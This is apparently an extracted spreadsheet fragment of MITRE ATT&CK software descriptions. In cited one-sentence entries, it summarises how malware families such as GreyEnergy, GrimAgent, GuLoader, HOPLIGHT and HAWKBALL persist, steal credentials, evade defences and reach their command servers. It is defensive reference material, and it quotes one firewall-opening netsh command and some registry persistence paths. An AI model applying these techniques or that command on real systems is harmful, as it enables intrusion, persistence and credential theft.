    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can use DNS for C2 communications.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can collect data from a compromised host.(Citation: Objective See Green Lambert for OSX Oct 2021)</t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can use multiple custom routines to decrypt strings prior to execution.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can delete the original executable after initial installation in addition to unused functions.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can use Keychain Services API functions to find and collect passwords, such as `SecKeychainFindInternetPassword` and `SecKeychainItemCopyAttributesAndData`.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can create a [Launch Agent](https://attack.mitre.org/techniques/T1543/001) with the `RunAtLoad` key-value pair set to &lt;code&gt;true&lt;/code&gt;, ensuring the `com.apple.GrowlHelper.plist` file runs every time a user logs in.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can add a plist file in the `Library/LaunchDaemons` to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can add [Login Items](https://attack.mitre.org/techniques/T1547/015) to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) has created a new executable named `Software Update Check` to appear legitimate.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) has been disguised as a Growl help file.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) has encrypted strings.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can use proxies for C2 traffic.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can add &lt;code&gt;init.d&lt;/code&gt; and &lt;code&gt;rc.d&lt;/code&gt; files in the &lt;code&gt;/etc&lt;/code&gt; folder to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can use `uname` to identify the operating system name, version, and processor type.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can obtain proxy information from a victim's machine using system environment variables.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>[Green Lambert](https://attack.mitre.org/software/S0690) can collect the date and time from a compromised host.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can use shell scripts for execution, such as &lt;code&gt;/bin/sh -c&lt;/code&gt;.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells. (Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) </t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using RSA-2048.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) digitally signs the malware with a code-signing certificate.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can download additional modules and payloads.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to harvest pressed keystrokes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module for [Mimikatz](https://attack.mitre.org/software/S0002) to collect Windows credentials from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) modifies conditions in the Registry and adds keys.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has used Tor relays for Command and Control servers.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts its configuration files with AES-256 and also encrypts its strings.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to inject a PE binary into a remote process.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is packed for obfuscation.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using AES256.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) enumerates all Windows services.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses cmd.exe to execute itself in-memory.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use a hardcoded server public RSA key to encrypt the first request to C2.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to add bytes to change the file hash.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can delete previously created tasks on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can collect data and files from a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has sent data related to a compromise host over its C2 channel.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can delete old binaries on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to enumerate files and directories on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to download and execute additional payloads.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632)  can pad C2 messages with random generated values.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use Native API including &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;ShellExecuteW&lt;/code&gt;.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can set persistence with a Registry run key.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to set persistence using the Task Scheduler.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can base64 encode C2 replies.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use an AES key to encrypt C2 communications.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can collect the OS, and build version on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[GrimAgent](https://attack.mitre.org/software/S0632) has used &lt;code&gt;Accept-Language&lt;/code&gt; to identify hosts in the United Kingdom, United States, France, and Spain.(Citation: Group IB GrimAgent July 2021) </t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can identify the country code on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can enumerate the IP and domain of a target system.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can identify the user id on a target machine.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can sleep for 195 - 205 seconds after payload execution and before deleting its task.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to use HTTP for C2 communications.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use the Windows Command Shell to execute commands, including its own removal.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can delete its executable from the &lt;code&gt;AppData\Local\Temp&lt;/code&gt; directory on the compromised host.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can download further malware for execution on the victim's machine.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>The [GuLoader](https://attack.mitre.org/software/S0561) executable has been retrieved via embedded macros in malicious Word documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has relied upon users clicking on links to malicious documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can use a number of different APIs for discovery and execution.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to inject shellcode into a donor processes that is started in a suspended state. [GuLoader](https://attack.mitre.org/software/S0561) has previously used RegAsm as a donor process.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can establish persistence via the Registry under &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has been spread in phishing campaigns using malicious web links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call &lt;code&gt;EnumWindows&lt;/code&gt;, and checking for Qemu guest agent.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to perform anti-debugging based on time checks, API calls, and CPUID.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to download malware from Google Drive.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) obfuscates C2 traffic with an altered version of base64.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Firewall.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Security Center, and Windows Defender.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) disable recovery options and deletes shadow copies from the victim.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses multiple techniques to obfuscate strings, including XOR.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to removable media.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses a custom packing algorithm.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) encrypts C2 traffic using an RC4 key.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to network shares.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services by using cmd.exe.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can delete a specified file.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can execute PowerShell scripts.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about running processes on the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain screenshots from the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about the OS, processor, and BIOS.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can use WMI queries to gather system information.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) has used &lt;code&gt;-WindowStyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>The "tDiscoverer" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. [HAMMERTOSS](https://attack.mitre.org/software/S0037) binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is known to use PowerShell.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is controlled via commands that are appended to image files.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>Before being appended to image files, [HAMMERTOSS](https://attack.mitre.org/software/S0037) commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>The "Uploader" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) visits a hard-coded server over HTTP/S to download the images [HAMMERTOSS](https://attack.mitre.org/software/S0037) uses to receive commands.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>can download and execute a second-stage payload.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>can collect the victim user name.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) opens the Windows Firewall to modify incoming connections.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) binds and listens on port 443 with a FakeTLS method.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses FakeTLS to communicate with its C2 server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses the command &lt;code&gt;cmd.exe /c netsh firewall add portopening TCP 443 "adp"&lt;/code&gt; and makes the victim machine function as a proxy server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses cmd.exe to execute &lt;code&gt;netsh&lt;/code&gt;commands.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted data with XOR before sending it over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used an OLE object that uses Equation Editor to drop the embedded shellcode.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has sent system information and files over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HAWKBALL](https://attack.mitre.org/software/S0391) has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.(Citation: FireEye HAWKBALL Jun 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[HAWKBALL](https://attack.mitre.org/software/S0391) has the ability to delete files.(Citation: FireEye HAWKBALL Jun 2019)	</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted the payload with an XOR-based algorithm.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the OS version, architecture information, and computer name.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the user name of the system.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) kills anti-virus found on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) scans to identify open ports on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can use an embedded RSA-2048 public key to encrypt victim data for ransom.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) has the ability to enumerate network resources.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can search for specific processes to terminate.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can enumerate logical drives on a target system.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can use WMI to delete volume shadow copies.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) injects a DLL for [Downdelph](https://attack.mitre.org/software/S0134) into the explorer.exe process.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) can perform credential dumping.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>Some strings in [HOMEFRY](https://attack.mitre.org/software/S0232) are obfuscated with XOR x56.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) uses a command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified the firewall using [netsh](https://attack.mitre.org/software/S0108).(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has used its C2 channel to exfiltrate data.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple C2 channels in place in case one fails.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed enumerating system drives and partitions.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has the ability to connect to a remote host in order to upload and download files.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has connected outbound over TCP port 443 with a FakeTLS method.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed loading several APIs associated with Pass the Hash.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has injected into running processes.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple proxy options that mask traffic between the malware and the remote operators.(Citation: US-CERT HOPLIGHT Apr 2019)	
</t>
  </si>
  <si>
    <t>A variant of [HOPLIGHT](https://attack.mitre.org/software/S0376) hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key &lt;code&gt;SYSTEM\CurrentControlSet\Control\Lsa Name&lt;/code&gt;.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has the capability to harvest credentials and passwords from the SAM database.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used svchost.exe to execute a malicious DLL .(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has utilized Zlib compression to obfuscate the communications payload. (Citation: US-CERT HOPLIGHT Apr 2019)	
</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting victim machine information like OS version, drivers, volume information and more.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting system time from victim machines.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) can launch cmd.exe to execute commands on the system.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can inject into into running processes.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can proxy TCP socket connections to obfuscate command and control infrastructure.(Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DLL side-loading.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DNS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) deletes its original installer file once installation is complete.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of listing files, folders, and drives on a victim.(Citation: Dell TG-3390)(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of writing a file to the compromised system from the C2 server.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of capturing keystrokes on victims.(Citation: Dell TG-3390)</t>
  </si>
  <si>
